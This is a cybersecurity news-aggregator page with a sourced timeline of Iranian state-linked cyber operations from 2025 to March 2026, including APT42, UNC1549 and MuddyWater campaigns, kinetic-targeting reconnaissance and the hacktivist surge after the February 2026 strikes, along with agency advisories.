CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Iranian Cyber Threat Activity Against U.S. Critical Infrastructure and Kinetic Targeting

First reported
Last updated
5 unique sources, 13 articles

Summary

Hide ▲

Iranian state-sponsored and affiliated cyber threat actors are actively escalating retaliatory campaigns following joint Israeli-US military strikes on February 28, 2026, with Google’s Threat Intelligence Group (GTIG) warning of imminent, aggressive cyber-attacks against a broadened target set. While Iran’s digital infrastructure remains severely disrupted (internet connectivity at ~4% of normal), over 150 hacktivist incidents—DDoS attacks, defacements, and unverified breach claims—were recorded within 48 hours, targeting government, banking, aviation, and telecom sectors globally. The UK’s NCSC has now issued an urgent advisory for organizations with Middle East exposure to review cybersecurity postures, warning that Iranian actors maintain operational capability despite the blackout and may exploit supply chains or regional offices as attack vectors. Prior to this surge, Iranian actors conducted long-term espionage and destructive campaigns, including the use of ‘wiper’ malware, spear-phishing against global embassies, and cyber-enabled kinetic targeting—such as maritime AIS reconnaissance to facilitate missile strikes. Groups like APT42, Subtle Snail (UNC1549), and Imperial Kitten deployed tailored malware (e.g., MINIBIKE, TAMECAT) to infiltrate telecommunications, aerospace, and defense sectors, while MuddyWater accessed live CCTV streams for real-time attack planning. U.S. agencies, including CISA, continue to urge critical infrastructure operators to implement multi-factor authentication, maintain offline backups, and report incidents promptly, as Iran’s tactics evolve to combine ransomware-as-a-smokescreen, destructive wipers, and multi-actor obfuscation.

Timeline

  1. 02.03.2026 17:00 3 articles · 12h ago

    Iran Launches Massive Cyber Retaliation After Military Strikes

    Following joint Israeli-US strikes on Iranian leadership, military, and nuclear sites on February 28, 2026, Iran’s digital infrastructure suffered catastrophic disruption, with internet connectivity collapsing to ~4% of normal levels. The outage crippled government services, official media, energy, and aviation sectors, coinciding with retaliatory missile/drone attacks on Israeli and U.S. regional targets. Between February 28–March 1, over 150 hacktivist incidents—including DDoS attacks, website defacements, and unverified data breach claims—were recorded, targeting government, banking, aviation, and telecom sectors globally. Google’s Threat Intelligence Group (GTIG) warns of an imminent expansion of Iranian cyber retaliation, predicting aggressive attacks against GCC nations (Qatar, Bahrain, Jordan, UAE, Kuwait) hosting US military bases, as well as broader global targets. The UK’s NCSC has now issued an advisory confirming that Iranian state and Iran-linked cyber actors retain operational capability despite the blackout, urging organizations with Middle East exposure to review cybersecurity postures, increase monitoring, and prepare for potential DDoS, phishing, and ICS-targeting attacks. Security experts assess that Iran will leverage its established playbook—ransomware-as-a-smokescreen, destructive wipers, and multi-actor obfuscation—while prioritizing victims in regions with lower cyber resilience.

    Show sources
    Open in new tab
  2. 20.11.2025 09:35 1 articles · 3mo ago

    Iranian Threat Actors Use Cyber Reconnaissance for Kinetic Attacks

    Iranian threat actors, including Imperial Kitten and MuddyWater, have been conducting cyber reconnaissance to facilitate physical attacks. Imperial Kitten targeted maritime vessels, gaining access to CCTV cameras and AIS data, which was used to plan a missile strike. MuddyWater accessed live CCTV streams in Jerusalem to gather real-time visual intelligence. These activities highlight the integration of cyber and physical attack methods by nation-state actors.

    Show sources
    Open in new tab
  3. 14.11.2025 16:40 1 articles · 3mo ago

    APT42 Launches SpearSpecter Espionage Campaign

    The Iranian state-sponsored threat actor APT42 has been observed targeting individuals and organizations of interest to the IRGC as part of a new espionage-focused campaign codenamed SpearSpecter. The campaign, detected in early September 2025 and assessed to be ongoing, systematically targets high-value senior defense and government officials using personalized social engineering tactics. The campaign extends to the targets' family members, creating a broader attack surface that exerts more pressure on the primary targets. APT42 is known for its ability to mount convincing social engineering campaigns that can run for days or weeks to build trust with the targets before sending a malicious payload or tricking them into clicking on booby-trapped links. The SpearSpecter campaign is carried out by cluster D of APT42, which focuses more on malware-based operations, while another campaign detailed by Check Point was carried out by cluster B of the same group, which focuses more on credential harvesting. The campaign involves impersonating trusted WhatsApp contacts to send a malicious link to a supposed required document for an upcoming meeting or conference. When the link is clicked, it initiates a redirect chain to serve a WebDAV-hosted Windows shortcut (LNK) masquerading as a PDF file by taking advantage of the "search-ms:" protocol handler. The LNK file establishes contact with a Cloudflare Workers subdomain to retrieve a batch script that functions as a loader for TAMECAT, a known PowerShell backdoor. TAMECAT employs various modular components to facilitate data exfiltration and remote control, using HTTPS, Discord, and Telegram for command-and-control (C2). The PowerShell framework uses three distinct channels for C2, suggesting the threat actor's goal of maintaining persistent access to compromised hosts even if one pathway gets detected and blocked. TAMECAT comes equipped with features to conduct reconnaissance, harvest files matching certain extensions, steal data from web browsers like Google Chrome and Microsoft Edge, collect Outlook mailboxes, and take screenshots at 15-second intervals. The data is exfiltrated over HTTPS or FTP, and the malware adopts various stealthy techniques to evade detection and resist analysis efforts.

    Show sources
    Open in new tab
  4. 23.09.2025 00:00 2 articles · 5mo ago

    Nimbus Manticore Expands Operations to Western Europe

    The Iran-linked cyber-espionage group Nimbus Manticore, also known as UNC1549 and Smoke Sandstorm, has expanded its operations to target critical infrastructure organizations across Western Europe, including Denmark, Portugal, and Sweden. The group uses sophisticated malware variants, including MiniJunk and MiniBrowse, to gain persistent access to infected systems and steal credentials from Chrome and Edge browsers. MiniJunk is an advanced version of the Minibike backdoor, featuring improved obfuscation techniques, code signing, and multiple C2 servers to evade detection. The malware employs multi-stage sideloading to install and establish persistence on victim systems, leveraging fake job-related login pages and tailored spear-phishing emails. The group's operations are associated with the Iranian Revolutionary Guard Corps (IRGC) and have been active since at least 2022, focusing on the aerospace and defense sectors in Israel and the Middle East. Additionally, UNC1549 (aka Nimbus Manticore or Subtle Snail) has been observed deploying backdoors like TWOSTROKE and DEEPROOT in attacks targeting aerospace, aviation, and defense industries in the Middle East. The group has been active since late 2023 through 2025, employing sophisticated initial access vectors including abuse of third-party relationships, VDI breakouts, and highly targeted phishing. The group uses a combination of phishing campaigns and leveraging trusted relationships with third-party suppliers and partners to gain initial access. UNC1549 abuses credentials associated with services like Citrix, VMWare, and Azure Virtual Desktop and Application (VDA) to establish an initial foothold and break out of virtualized sessions. The group targets IT staff and administrators to obtain credentials with elevated privileges for deeper network access. Post-exploitation activities include reconnaissance, credential harvesting, lateral movement, defense evasion, and information theft, focusing on network/IT documentation, intellectual property, and emails. Custom tools used by UNC1549 include MINIBIKE, TWOSTROKE, DEEPROOT, LIGHTRAIL, GHOSTLINE, POLLBLEND, DCSYNCER.SLICK, CRASHPAD, SIGHTGRAB, and TRUSTTRAP. The group uses publicly available programs like AD Explorer, Atelier Web Remote Commander (AWRC), and SCCMVNC for remote control and reconnaissance. UNC1549 maintains stealth and command-and-control (C2) using extensive reverse SSH shells and domains mimicking the victim's industry. The group plants backdoors that beacon silently for months, only activating them to regain access after the victim has attempted eradication.

    Show sources
    Open in new tab
  5. 19.09.2025 16:59 4 articles · 5mo ago

    Subtle Snail Targets Global Telecommunications and Aerospace Companies

    The Iran-nexus cyber espionage group UNC1549, also known as Subtle Snail, has expanded its operations to target critical infrastructure organizations across Western Europe, including Denmark, Portugal, and Sweden. The group uses sophisticated malware variants, including MiniJunk and MiniBrowse, to gain persistent access to infected systems and steal credentials from Chrome and Edge browsers. MiniJunk is an advanced version of the Minibike backdoor, featuring improved obfuscation techniques, code signing, and multiple C2 servers to evade detection. The malware employs multi-stage sideloading to install and establish persistence on victim systems, leveraging fake job-related login pages and tailored spear-phishing emails. The group's operations are associated with the Iranian Revolutionary Guard Corps (IRGC) and have been active since at least 2022, focusing on the aerospace and defense sectors in Israel and the Middle East. Additionally, UNC1549 (aka Nimbus Manticore or Subtle Snail) has been observed deploying backdoors like TWOSTROKE and DEEPROOT in attacks targeting aerospace, aviation, and defense industries in the Middle East. The group has been active since late 2023 through 2025, employing sophisticated initial access vectors including abuse of third-party relationships, VDI breakouts, and highly targeted phishing. The group uses a combination of phishing campaigns and leveraging trusted relationships with third-party suppliers and partners to gain initial access. UNC1549 abuses credentials associated with services like Citrix, VMWare, and Azure Virtual Desktop and Application (VDA) to establish an initial foothold and break out of virtualized sessions. The group targets IT staff and administrators to obtain credentials with elevated privileges for deeper network access. Post-exploitation activities include reconnaissance, credential harvesting, lateral movement, defense evasion, and information theft, focusing on network/IT documentation, intellectual property, and emails. Custom tools used by UNC1549 include MINIBIKE, TWOSTROKE, DEEPROOT, LIGHTRAIL, GHOSTLINE, POLLBLEND, DCSYNCER.SLICK, CRASHPAD, SIGHTGRAB, and TRUSTTRAP. The group uses publicly available programs like AD Explorer, Atelier Web Remote Commander (AWRC), and SCCMVNC for remote control and reconnaissance. UNC1549 maintains stealth and command-and-control (C2) using extensive reverse SSH shells and domains mimicking the victim's industry. The group plants backdoors that beacon silently for months, only activating them to regain access after the victim has attempted eradication.

    Show sources
    Open in new tab
  6. 03.09.2025 13:30 2 articles · 6mo ago

    Iranian Cyber Threat Actors Conduct Global Phishing Campaign

    The first email in this campaign was sent on August 19, 2025, from a legitimate address belonging to the Oman Ministry of Foreign Affairs in Paris, directed back at the organization. The emails were forwarded through a NordVPN exit node in Jordan to mask their origin. The emails included a blurred Word document attachment requiring users to enable macros to view it clearly. The document concealed malicious Visual Basic for Applications (VBA) macros, which, when enabled, executed a payload that gathered basic system information. The campaign targeted around four dozen embassies, consulates, and government ministries from nearly every corner of the earth. The attackers also targeted at least 10 other notable international organizations, including the United Nations, its Office on Drugs and Crime (UNODC), and its Children's Fund (UNICEF); the African Union; and humanitarian organizations like the Order of Malta. The campaign is assessed to have likely concluded just days after it began, as the attackers' command-and-control (C2) infrastructure appears to be inactive.

    Show sources
    Open in new tab
  7. 30.06.2025 15:00 5 articles · 8mo ago

    U.S. Agencies Warn of Potential Iranian Cyber Activity Against Critical Infrastructure

    Iranian state-sponsored or affiliated cyber threat actors are targeting U.S. industries and government agencies with a rise in malicious cyber activity, including destructive 'wiper' attacks aimed at causing complete network loss. These actors exploit known vulnerabilities, compromise weak passwords, and use tactics like spear phishing, password spraying, and credential stuffing to escalate from account compromise to full network destruction. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is actively monitoring these threats, sharing intelligence with partners, and urging organizations to strengthen basic defenses, such as multi-factor authentication, and report suspected incidents immediately to [email protected]. Following joint Israeli-US strikes on Iran in late February 2026, Iranian cyber retaliation surged, with over 150 hacktivist incidents—including DDoS attacks, defacements, and data breach claims—recorded in 48 hours. Experts warn of escalated Iranian operations leveraging ransomware-as-a-smokescreen, destructive wipers, and multi-actor obfuscation tactics against U.S. and allied networks. The UK NCSC advised organizations with Middle East exposure to review risk postures and secure offline backups, though no direct increase in threats to the UK was observed as of March 2, 2026.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

State-Sponsored Actors Target Defense Industrial Base with Multi-Vector Cyber Operations

State-sponsored actors from China, Iran, North Korea, and Russia have intensified cyber operations against the defense industrial base (DIB) sector. The attacks focus on defense entities involved in the Russia-Ukraine War, exploitation of hiring processes, use of edge devices for initial access, and supply chain risks from breaches in the manufacturing sector. The campaigns involve sophisticated malware, phishing, and social engineering tactics to evade detection and exfiltrate sensitive data.

Open in new tab

Bizarre Bazaar Campaign Exploits Exposed LLM Endpoints

A cybercrime operation named 'Bizarre Bazaar' is actively targeting exposed or poorly authenticated LLM (Large Language Model) service endpoints. Over 35,000 attack sessions were recorded in 40 days, involving unauthorized access to steal computing resources, resell API access, exfiltrate data, and pivot into internal systems. The campaign highlights the emerging threat of 'LLMjacking' attacks, where attackers exploit misconfigurations in LLM infrastructure to monetize access through cryptocurrency mining and darknet markets. The SilverInc service, marketed on Telegram and Discord, resells access to more than 50 AI models in exchange for cryptocurrency or PayPal payments. A recent investigation by SentinelOne SentinelLABS and Censys revealed 175,000 unique Ollama hosts across 130 countries, many of which are configured with tool-calling capabilities, increasing the risk of LLMjacking attacks.

Open in new tab

WIRTE Deploys AshTag Espionage Backdoor via AshenLoader Sideloading

The advanced persistent threat (APT) group WIRTE, also tracked as Ashen Lepus, has been targeting government and diplomatic entities in the Middle East since 2020 with a previously undocumented malware suite called AshTag. The group leverages AshenLoader for sideloading to deploy the AshTag backdoor, which facilitates espionage and data theft. Recent attacks have expanded to include Oman and Morocco, with a focus on geopolitical lures related to Turkey and Palestine. The campaign involves phishing emails, PDF decoys, and a multi-stage infection process to minimize forensic artifacts. The AshTag backdoor is modular and designed for persistence, remote command execution, and data exfiltration. The group's activities have remained persistent throughout regional conflicts, unlike other affiliated threat groups. The threat actors have been observed conducting hands-on data theft, staging documents of interest in the C:\Users\Public folder before exfiltrating them to an attacker-controlled server.

Open in new tab

UK NCSC Launches Proactive Notifications for Vulnerability Alerts

The UK's National Cyber Security Center (NCSC) has introduced a pilot service called Proactive Notifications to alert organizations about vulnerabilities in their exposed devices. The service identifies unpatched vulnerabilities and weak security configurations using public data and internet scans, then recommends specific software updates or security improvements. The pilot program targets UK domains and IP addresses, but it is not exhaustive and should not replace other security alerts. Organizations are encouraged to also use the NCSC's Early Warning service for real-time threat notifications.

Open in new tab

Bloody Wolf APT Expands Operations to Russia and Central Asia Using NetSupport RAT

The Bloody Wolf APT group, also tracked as Stan Ghouls, has expanded its operations to include Russia, targeting government entities, logistics companies, medical facilities, and educational institutions. The campaign has infected about 50 victims in Uzbekistan and 10 devices in Russia, with additional infections identified in Kazakhstan, Turkey, Serbia, and Belarus. The group has shifted from traditional malware to using legitimate remote-access software, specifically NetSupport RAT, deployed via Java-based delivery methods. The campaign involves sophisticated social engineering tactics, including impersonating government ministries and using geofenced infrastructure to deliver malicious payloads. The group's activities have been ongoing since at least June 2025, with a notable increase in operations by October 2025. The campaign has targeted finance, government, and information technology (IT) sectors. The shift to legitimate remote-administration tools indicates an evolution in the group's tactics to evade detection and blend into normal IT activity. The group has also expanded its malware arsenal to target IoT devices, with Mirai botnet payloads staged on associated infrastructure.

Open in new tab